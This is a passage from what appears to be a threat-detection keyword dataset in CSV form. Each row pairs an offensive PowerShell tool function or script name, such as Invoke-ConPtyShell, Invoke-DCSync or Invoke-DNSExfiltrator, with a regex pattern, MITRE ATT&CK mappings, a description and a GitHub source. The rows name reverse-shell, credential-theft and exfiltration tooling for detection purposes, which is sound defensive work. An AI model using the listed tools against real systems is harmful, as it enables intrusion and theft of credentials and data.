previous passwords of Active Directory User","T1110.003 - T1110.001","TA0001 - TA0006","N/A","N/A","Credential Access","https://github.com/wavestone-cdt/Invoke-CleverSpray","1","0","N/A","10","1","60","11","2021-09-09T07:35:32Z","2018-11-29T10:05:25Z" "*Invoke-CleverSpray.ps1*",".{0,1000}Invoke\-CleverSpray\.ps1.{0,1000}","offensive_tool_keyword","Invoke-CleverSpray","Password Spraying Script detecting current and previous passwords of Active Directory User","T1110.003 - T1110.001","TA0001 - TA0006","N/A","N/A","Credential Access","https://github.com/wavestone-cdt/Invoke-CleverSpray","1","1","N/A","10","1","60","11","2021-09-09T07:35:32Z","2018-11-29T10:05:25Z" "*Invoke-ClipboardMonitor*",".{0,1000}Invoke\-ClipboardMonitor.{0,1000}","offensive_tool_keyword","empire","Empire scripts functions. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1106","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ","Frameworks","https://github.com/EmpireProject/Empire","1","1","N/A","N/A","10","7291","2777","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z" "*Invoke-CMLootDownload*",".{0,1000}Invoke\-CMLootDownload.{0,1000}","offensive_tool_keyword","CMLoot","Find interesting files stored on (System Center) Configuration Manager (SCCM/CM) SMB shares","T1083 - T1039","TA0007 - TA0001","N/A","N/A","Discovery","https://github.com/1njected/CMLoot","1","1","N/A","8","2","140","20","2023-02-05T00:24:31Z","2022-06-02T10:59:21Z" "*Invoke-CMLootExtract*",".{0,1000}Invoke\-CMLootExtract.{0,1000}","offensive_tool_keyword","CMLoot","Find interesting files stored on (System Center) Configuration Manager (SCCM/CM) SMB shares","T1083 - T1039","TA0007 - TA0001","N/A","N/A","Discovery","https://github.com/1njected/CMLoot","1","1","N/A","8","2","140","20","2023-02-05T00:24:31Z","2022-06-02T10:59:21Z" "*Invoke-CMLootHunt *",".{0,1000}Invoke\-CMLootHunt\s.{0,1000}","offensive_tool_keyword","CMLoot","Find interesting files stored on (System Center) Configuration Manager (SCCM/CM) SMB shares","T1083 - T1039","TA0007 - TA0001","N/A","N/A","Discovery","https://github.com/1njected/CMLoot","1","0","N/A","8","2","140","20","2023-02-05T00:24:31Z","2022-06-02T10:59:21Z" "*Invoke-CMLootInventory*",".{0,1000}Invoke\-CMLootInventory.{0,1000}","offensive_tool_keyword","CMLoot","Find interesting files stored on (System Center) Configuration Manager (SCCM/CM) SMB shares","T1083 - T1039","TA0007 - TA0001","N/A","N/A","Discovery","https://github.com/1njected/CMLoot","1","1","N/A","8","2","140","20","2023-02-05T00:24:31Z","2022-06-02T10:59:21Z" "*Invoke-ConPtyShell *",".{0,1000}Invoke\-ConPtyShell\s.{0,1000}","offensive_tool_keyword","reverse-shell-generator","Reverse Shell Generator","T1105 - T1071.004 - T1016 - T1090 - T1029 - T1041","TA0011 - TA0010- TA0002","N/A","N/A","C2","https://github.com/0dayCTF/reverse-shell-generator","1","0","N/A","10","10","N/A","N/A","N/A","N/A" "*Invoke-ConPtyShell*",".{0,1000}Invoke\-ConPtyShell.{0,1000}","offensive_tool_keyword","ConPtyShell","ConPtyShell - Fully Interactive Reverse Shell for Windows","T1059.001 - T1021.004 - T1056.003","TA0002 - TA0005 - TA0011","N/A","N/A","C2","https://github.com/antonioCoco/ConPtyShell","1","1","N/A","10","10","912","157","2023-01-20T10:52:52Z","2019-09-13T22:11:18Z" "*Invoke-ConPtyShell*",".{0,1000}Invoke\-ConPtyShell.{0,1000}","offensive_tool_keyword","nishang","Nishang is a framework and collection of scripts and payloads which enables usage of PowerShell for offensive security penetration testing and red teaming. Nishang is useful during all phases of penetration testing.","T1550 T1555 T1212 T1558","N/A","N/A","N/A","Exploitation tools","https://github.com/samratashok/nishang","1","1","N/A","N/A","10","8342","2385","2024-04-25T19:39:44Z","2014-05-19T11:48:24Z" "*Invoke-ConPtyShell*",".{0,1000}Invoke\-ConPtyShell.{0,1000}","offensive_tool_keyword","Villain","Villain is a C2 framework that can handle multiple TCP socket & HoaxShell-based reverse shells. enhance their functionality with additional features (commands. utilities etc) and share them among connected sibling servers (Villain instances running on different machines).","T1021 - T1055 - T1071 - T1570","TA0001 - TA0002 - TA0003 - TA0008 - TA0010","N/A","N/A","C2","https://github.com/t3l3machus/Villain","1","1","N/A","10","10","3572","575","2024-03-11T06:48:03Z","2022-10-25T22:02:59Z" "*Invoke-ConPtyShell.ps1*",".{0,1000}Invoke\-ConPtyShell\.ps1.{0,1000}","offensive_tool_keyword","ConPtyShell","ConPtyShell - Fully Interactive Reverse Shell for Windows","T1059.001 - T1021.004 - T1056.003","TA0002 - TA0005 - TA0011","N/A","N/A","C2","https://github.com/antonioCoco/ConPtyShell","1","1","N/A","10","10","912","157","2023-01-20T10:52:52Z","2019-09-13T22:11:18Z" "*Invoke-ConPtyShell.ps1*",".{0,1000}Invoke\-ConPtyShell\.ps1.{0,1000}","offensive_tool_keyword","reverse-shell-generator","Reverse Shell Generator","T1105 - T1071.004 - T1016 - T1090 - T1029 - T1041","TA0011 - TA0010- TA0002","N/A","N/A","C2","https://github.com/0dayCTF/reverse-shell-generator","1","1","N/A","10","10","N/A","N/A","N/A","N/A" "*Invoke-CreateRemoteThread*",".{0,1000}Invoke\-CreateRemoteThread.{0,1000}","offensive_tool_keyword","mimikatz","Invoke-Mimikatz.ps1 function name","T1003 - T1021.001 - T1053 - T1055 - T1057 - T1059.003 - T1070 - T1071 - T1078.002 - T1078.003 - T1078.005 - T1106 - T1136 - T1204 - T1218 - T1547 - T1555.003 - T1555.004 - T1573 - T1574 - T1596 - T1543","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0010 - TA0040","N/A","N/A","Exploitation tools","https://github.com/PowerShellMafia/PowerSploit/blob/master/Exfiltration/Invoke-Mimikatz.ps1","1","1","N/A","10","10","11481","4570","2020-08-17T23:19:49Z","2012-05-26T16:08:48Z" "*Invoke-CredentialFilesCheck*",".{0,1000}Invoke\-CredentialFilesCheck.{0,1000}","offensive_tool_keyword","AutoRDPwn","AutoRDPwn is a post-exploitation framework created in Powershell designed primarily to automate the Shadow attack on Microsoft Windows computers","T1078 - T1021.001 - T1003.001 - T1547.009 - T1543.003 - T1056.001 - T1021.002","TA0004 - TA0003 - TA0006 - TA0002 - TA0008","N/A","N/A","Frameworks","https://github.com/JoelGMSec/AutoRDPwn","1","1","N/A","N/A","10","1044","504","2022-09-04T20:44:27Z","2018-07-29T08:22:20Z" "*Invoke-CredentialFilesCheck*",".{0,1000}Invoke\-CredentialFilesCheck.{0,1000}","offensive_tool_keyword","PrivescCheck","Privilege Escalation Enumeration Script for Windows","T1053 - T1088","TA0005 - TA0004","N/A","N/A","Privilege Escalation","https://github.com/itm4n/PrivescCheck","1","1","N/A","10","10","2620","400","2024-03-11T20:20:35Z","2020-01-16T12:28:10Z" "*Invoke-CredentialGuardCheck*",".{0,1000}Invoke\-CredentialGuardCheck.{0,1000}","offensive_tool_keyword","PrivescCheck","Privilege Escalation Enumeration Script for Windows","T1053 - T1088","TA0005 - TA0004","N/A","N/A","Privilege Escalation","https://github.com/itm4n/PrivescCheck","1","1","N/A","10","10","2620","400","2024-03-11T20:20:35Z","2020-01-16T12:28:10Z" "*Invoke-CredentialInjection*",".{0,1000}Invoke\-CredentialInjection.{0,1000}","offensive_tool_keyword","empire","Empire scripts functions. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1106","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ","Frameworks","https://github.com/EmpireProject/Empire","1","1","N/A","N/A","10","7291","2777","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z" "*Invoke-CredentialInjection*",".{0,1000}Invoke\-CredentialInjection.{0,1000}","offensive_tool_keyword","empire","Empire scripts paths. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1054","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ","Frameworks","https://github.com/EmpireProject/Empire","1","1","N/A","N/A","10","7291","2777","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z" "*Invoke-CredentialInjection*",".{0,1000}Invoke\-CredentialInjection.{0,1000}","offensive_tool_keyword","PowerSploit","PowerSploit is a collection of Microsoft PowerShell modules that can be used to aid penetration testers during all phases of an assessment. PowerSploit is comprised of the following modules and scripts","T1059 - T1053 - T1003 - T1114 - T1204","TA0002 - TA0008 - TA0011","N/A","N/A","Frameworks","https://github.com/PowerShellMafia/PowerSploit","1","0","N/A","10","10","11481","4570","2020-08-17T23:19:49Z","2012-05-26T16:08:48Z" "*Invoke-CredentialInjection.ps1*",".{0,1000}Invoke\-CredentialInjection\.ps1.{0,1000}","offensive_tool_keyword","PowerSploit","PowerSploit is a collection of Microsoft PowerShell modules that can be used to aid penetration testers during all phases of an assessment. PowerSploit is comprised of the following modules and scripts","T1059 - T1053 - T1003 - T1114 - T1204","TA0002 - TA0008 - TA0011","N/A","N/A","Frameworks","https://github.com/PowerShellMafia/PowerSploit","1","1","N/A","10","10","11481","4570","2020-08-17T23:19:49Z","2012-05-26T16:08:48Z" "*Invoke-CredentialInjection.ps1*",".{0,1000}Invoke\-CredentialInjection\.ps1.{0,1000}","offensive_tool_keyword","PowerSploit","PowerSploit is a collection of Microsoft PowerShell modules that can be used to aid penetration testers during all phases of an assessment. PowerSploit is comprised of the following modules and scripts","T1059 - T1053 - T1003 - T1114 - T1204","TA0002 - TA0008 - TA0011","N/A","N/A","Frameworks","https://github.com/PowerShellMafia/PowerSploit","1","1","N/A","10","10","11481","4570","2020-08-17T23:19:49Z","2012-05-26T16:08:48Z" "*Invoke-CredentialsPhish*",".{0,1000}Invoke\-CredentialsPhish.{0,1000}","offensive_tool_keyword","nishang","Nishang is a framework and collection of scripts and payloads which enables usage of PowerShell for offensive security penetration testing and red teaming. Nishang is useful during all phases of penetration testing.","T1550 T1555 T1212 T1558","N/A","N/A","N/A","Exploitation tools","https://github.com/samratashok/nishang","1","1","N/A","N/A","10","8342","2385","2024-04-25T19:39:44Z","2014-05-19T11:48:24Z" "*Invoke-CylanceDisarm -ProcessID * -DisableMemDef*",".{0,1000}Invoke\-CylanceDisarm\s\-ProcessID\s.{0,1000}\s\-DisableMemDef.{0,1000}","offensive_tool_keyword","RandomPS-Scripts","PowerShell wrapper for a Cylance Bypass","T1055 - T1068 - T1562.001","TA0005 - TA0009","N/A","N/A","Defense Evasion","https://github.com/xorrior/RandomPS-Scripts","1","0","N/A","8","4","313","89","2017-12-29T17:16:42Z","2015-02-25T04:52:01Z" "*Invoke-DAFT.*",".{0,1000}Invoke\-DAFT\..{0,1000}","offensive_tool_keyword","PowerSharpPack","Many useful offensive CSharp Projects wraped into Powershell for easy usage","T1059.001 - T1027 - T1055.012","TA0002 - TA0005","N/A","N/A","Exploitation tools","https://github.com/S3cur3Th1sSh1t/PowerSharpPack","1","1","N/A","10","10","1405","295","2024-04-24T21:23:25Z","2020-04-06T16:34:52Z" "*invoke-daisychain*",".{0,1000}invoke\-daisychain.{0,1000}","offensive_tool_keyword","poshc2","keywords from poshc2 usage - a proxy aware C2 framework used to aid red teamers with post-exploitation and Lateral Movement.","T1548.002 - T1134.002 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560.001 - T1119 - T1110 - T1555 - T1482 - T1546.003 - T1068 - T1210 - T1083 - T1056.001 - T1046 - T1040 - T1003.001 - T1201 - T1069.001 - T1055 - T1090 - T1082 - T1016 - T1049 - T1007 - T1569.002 - T1552.001 - T1550.002 - T1047","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011","N/A","APT33 - HEXANE","C2","https://github.com/nettitude/PoshC2","1","1","N/A","10","10","1692","317","2024-04-15T07:51:09Z","2018-07-23T08:53:32Z" "*Invoke-DCOM.ps1*",".{0,1000}Invoke\-DCOM\.ps1.{0,1000}","offensive_tool_keyword","empire","Empire scripts paths. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1091","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ","Frameworks","https://github.com/EmpireProject/Empire","1","1","N/A","N/A","10","7291","2777","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z" "*Invoke-DCOM.ps1*",".{0,1000}Invoke\-DCOM\.ps1.{0,1000}","offensive_tool_keyword","SharpSploit","SharpSploit is a .NET post-exploitation library written in C# that aims to highlight the attack surface of .NET and make the use of offensive .NET easier for red teamers.","T1055 - T1086 - T1003 - T1053 - T1547 - T1110 - T1021 - T1070 - T1562 - T1574 - T1543 - T1098","TA0002 - TA0003 - TA0005 - TA0006 - TA0010 - TA0040","N/A","N/A","Exploitation tools","https://github.com/cobbr/SharpSploit","1","1","N/A","10","10","1692","303","2021-08-12T18:23:15Z","2018-09-20T14:22:37Z" "*Invoke-DCOMObjectScan.json*",".{0,1000}Invoke\-DCOMObjectScan\.json.{0,1000}","offensive_tool_keyword","merlin","Merlin is a post-exploit Command & Control (C2) tool also known as a Remote Access Tool (RAT)","T1219 - T1105 - T1071 - T1090 - T1055 - T1047","TA0005 - TA0002 - TA0003 - TA0006 - TA0010 - TA0011","N/A","N/A","C2","https://github.com/Ne0nd0g/merlin","1","1","N/A","10","10","4934","792","2024-04-23T05:14:51Z","2017-01-06T11:18:20Z" "*invoke-dcompayload*",".{0,1000}invoke\-dcompayload.{0,1000}","offensive_tool_keyword","poshc2","keywords from poshc2 usage - a proxy aware C2 framework used to aid red teamers with post-exploitation and Lateral Movement.","T1548.002 - T1134.002 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560.001 - T1119 - T1110 - T1555 - T1482 - T1546.003 - T1068 - T1210 - T1083 - T1056.001 - T1046 - T1040 - T1003.001 - T1201 - T1069.001 - T1055 - T1090 - T1082 - T1016 - T1049 - T1007 - T1569.002 - T1552.001 - T1550.002 - T1047","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011","N/A","APT33 - HEXANE","C2","https://github.com/nettitude/PoshC2","1","1","N/A","10","10","1692","317","2024-04-15T07:51:09Z","2018-07-23T08:53:32Z" "*Invoke-DCOMPowerPointPivot*",".{0,1000}Invoke\-DCOMPowerPointPivot.{0,1000}","offensive_tool_keyword","merlin","Merlin is a post-exploit Command & Control (C2) tool also known as a Remote Access Tool (RAT)","T1219 - T1105 - T1071 - T1090 - T1055 - T1047","TA0005 - TA0002 - TA0003 - TA0006 - TA0010 - TA0011","N/A","N/A","C2","https://github.com/Ne0nd0g/merlin","1","1","N/A","10","10","4934","792","2024-04-23T05:14:51Z","2017-01-06T11:18:20Z" "*Invoke-DCSync*",".{0,1000}Invoke\-DCSync.{0,1000}","offensive_tool_keyword","Amnesiac","Amnesiac is a post-exploitation framework entirely written in PowerShell and designed to assist with Lateral Movement within Active Directory environments","T1021.002 - T1550.002","TA0008","N/A","N/A","Lateral Movement","https://github.com/Leo4j/Amnesiac","1","1","N/A","10","3","265","46","2024-04-18T15:39:34Z","2023-10-31T15:06:25Z" "*Invoke-DCSync*",".{0,1000}Invoke\-DCSync.{0,1000}","offensive_tool_keyword","empire","Empire scripts paths. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1056","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ","Frameworks","https://github.com/EmpireProject/Empire","1","1","N/A","N/A","10","7291","2777","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z" "*Invoke-DefenderExclusionsCheck*",".{0,1000}Invoke\-DefenderExclusionsCheck.{0,1000}","offensive_tool_keyword","PrivescCheck","Privilege Escalation Enumeration Script for Windows","T1053 - T1088","TA0005 - TA0004","N/A","N/A","Privilege Escalation","https://github.com/itm4n/PrivescCheck","1","1","N/A","10","10","2620","400","2024-03-11T20:20:35Z","2020-01-16T12:28:10Z" "*Invoke-DeleteGroup -Tokens * -groupID *",".{0,1000}Invoke\-DeleteGroup\s\-Tokens\s.{0,1000}\s\-groupID\s.{0,1000}","offensive_tool_keyword","GraphRunner","A Post-exploitation Toolset for Interacting with the Microsoft Graph API","T1114.002 - T1078 - T1213","TA0009 - TA0003 - TA0005","N/A","N/A","POST Exploitation tools","https://github.com/dafthack/GraphRunner","1","0","N/A","10","8","722","80","2024-03-14T17:05:34Z","2023-08-15T17:19:11Z" "*Invoke-DeleteOAuthApp -Tokens *",".{0,1000}Invoke\-DeleteOAuthApp\s\-Tokens\s.{0,1000}","offensive_tool_keyword","GraphRunner","A Post-exploitation Toolset for Interacting with the Microsoft Graph API","T1114.002 - T1078 - T1213","TA0009 - TA0003 - TA0005","N/A","N/A","POST Exploitation tools","https://github.com/dafthack/GraphRunner","1","0","N/A","10","8","722","80","2024-03-14T17:05:34Z","2023-08-15T17:19:11Z" "*Invoke-DeleteOAuthApp*",".{0,1000}Invoke\-DeleteOAuthApp.{0,1000}","offensive_tool_keyword","GraphRunner","A Post-exploitation Toolset for Interacting with the Microsoft Graph API","T1114.002 - T1078 - T1213","TA0009 - TA0003 - TA0005","N/A","N/A","POST Exploitation tools","https://github.com/dafthack/GraphRunner","1","0","Delete an OAuth App","10","8","722","80","2024-03-14T17:05:34Z","2023-08-15T17:19:11Z" "*Invoke-DHCPCheckup*",".{0,1000}Invoke\-DHCPCheckup.{0,1000}","offensive_tool_keyword","DDSpoof","DDSpoof is a tool that enables DHCP DNS Dynamic Update attacks against Microsoft DHCP servers in AD environments.","T1557 - T1584 - T1203","TA0005 - TA0003 TA0011","N/A","N/A","Sniffing & Spoofing","https://github.com/akamai/DDSpoof","1","1","N/A","9","2","105","13","2024-04-12T22:06:02Z","2023-12-14T06:47:45Z" "*Invoke-DinvokeKatz*",".{0,1000}Invoke\-DinvokeKatz.{0,1000}","offensive_tool_keyword","PowerSharpPack","Many useful offensive CSharp Projects wraped into Powershell for easy usage","T1059.001 - T1027 - T1055.012","TA0002 - TA0005","N/A","N/A","Exploitation tools","https://github.com/S3cur3Th1sSh1t/PowerSharpPack","1","1","N/A","10","10","1405","295","2024-04-24T21:23:25Z","2020-04-06T16:34:52Z" "*Invoke-DllHijackingCheck*",".{0,1000}Invoke\-DllHijackingCheck.{0,1000}","offensive_tool_keyword","AutoRDPwn","AutoRDPwn is a post-exploitation framework created in Powershell designed primarily to automate the Shadow attack on Microsoft Windows computers","T1078 - T1021.001 - T1003.001 - T1547.009 - T1543.003 - T1056.001 - T1021.002","TA0004 - TA0003 - TA0006 - TA0002 - TA0008","N/A","N/A","Frameworks","https://github.com/JoelGMSec/AutoRDPwn","1","1","N/A","N/A","10","1044","504","2022-09-04T20:44:27Z","2018-07-29T08:22:20Z" "*Invoke-DllHijackingCheck*",".{0,1000}Invoke\-DllHijackingCheck.{0,1000}","offensive_tool_keyword","PrivescCheck","Privilege Escalation Enumeration Script for Windows","T1053 - T1088","TA0005 - TA0004","N/A","N/A","Privilege Escalation","https://github.com/itm4n/PrivescCheck","1","1","N/A","10","10","2620","400","2024-03-11T20:20:35Z","2020-01-16T12:28:10Z" "*Invoke-DllInjection*",".{0,1000}Invoke\-DllInjection.{0,1000}","offensive_tool_keyword","empire","empire script function. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1047","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ","Frameworks","https://github.com/EmpireProject/Empire","1","1","N/A","N/A","10","7291","2777","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z" "*Invoke-DllInjection*",".{0,1000}Invoke\-DllInjection.{0,1000}","offensive_tool_keyword","PowerSploit","PowerSploit is a collection of Microsoft PowerShell modules that can be used to aid penetration testers during all phases of an assessment. PowerSploit is comprised of the following modules and scripts","T1059 - T1053 - T1003 - T1114 - T1204","TA0002 - TA0008 - TA0011","N/A","N/A","Frameworks","https://github.com/PowerShellMafia/PowerSploit","1","0","N/A","10","10","11481","4570","2020-08-17T23:19:49Z","2012-05-26T16:08:48Z" "*Invoke-DNSExfiltrator*",".{0,1000}Invoke\-DNSExfiltrator.{0,1000}","offensive_tool_keyword","DNSExfiltrator","DNSExfiltrator allows for transfering (exfiltrate) a file over a DNS request covert channel. This is basically a data leak testing tool allowing to exfiltrate data over a covert channel.","T1041 - T1048","TA0010 - TA0011","N/A","N/A","Data Exfiltration","https://github.com/Arno0x/DNSExfiltrator","1","1","N/A","10","9","827","180","2024-04-29T20:20:43Z","2017-12-20T13:58:09Z" "*Invoke-DNSUpdate.ps1*",".{0,1000}Invoke\-DNSUpdate\.ps1.{0,1000}","offensive_tool_keyword","Powermad","PowerShell MachineAccountQuota and DNS exploit tools","T1087 - T1098 - T1018 - T1046 - T1081","TA0007 - TA0006 - TA0005 - TA0001","N/A","N/A","POST Exploitation tools","https://github.com/Kevin-Robertson/Powermad","1","0","N/A","N/A","10","1123","168","2023-01-11T00:48:35Z","2017-09-05T18:34:03Z" "*Invoke-Dogz.ps1*",".{0,1000}Invoke\-Dogz\.ps1.{0,1000}","offensive_tool_keyword","mimidogz","Rewrite of Invoke-Mimikatz.ps1 to avoid AV detection","T1055 - T1560.001 - T1110.001 - T1003 - T1071","TA0005 - TA0040 - TA0006","N/A","N/A","Credential Access","https://github.com/projectb-temp/mimidogz","1","1","N/A","10","1","0","0","2019-02-11T10:14:10Z","2019-02-11T10:12:08Z" "*Invoke-DomainHarvest*",".{0,1000}Invoke\-DomainHarvest.{0,1000}","offensive_tool_keyword","MailSniper","Invoke-DomainHarvest* will attempt to connect to an * portal and determine a valid domain name for logging into the portal","T1595 T1114 T1590 T1591","N/A","N/A","N/A","Reconnaissance","https://github.com/dafthack/MailSniper","1","1","N/A","N/A","10","2810","550","2022-10-20T08:13:33Z","2016-09-08T00:36:51Z" "*Invoke-DomainHarvestOWA*",".{0,1000}Invoke\-DomainHarvestOWA.{0,1000}","offensive_tool_keyword","MailSniper","MailSniper is a penetration testing tool for searching through email in a Microsoft Exchange environment for specific terms (passwords. insider intel. network architecture information. etc.). It can be used as a non-administrative user to search their own email. or by an administrator to search the mailboxes of every user in a domain.","T1114 - T1134.002","TA0005 - TA0006","N/A","N/A","Credential 